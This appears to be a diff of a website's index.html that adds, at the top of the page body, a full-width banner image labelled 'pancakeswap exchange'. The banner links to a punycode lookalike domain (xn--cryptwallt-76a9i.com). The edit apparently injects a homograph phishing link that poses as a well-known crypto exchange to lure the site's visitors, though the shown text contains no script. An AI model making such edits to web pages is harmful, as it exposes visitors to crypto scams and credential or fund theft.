--- a/index.html
+++ b/index.html
@@ -31,6 +31,9 @@
   
 </head>
 <body>
+  <div class="container-fluid">
+<a href="https://xn--cryptwallt-76a9i.com/" rel="nofollow noopener"><img src="/pancakeswap.png" width="100%" height="auto" alt="pancakeswap exchange"></a>
+</div>
   
   <section data-bs-version="5.1" class="image3 cid-tby5RjLO2O" id="image3-1">
     
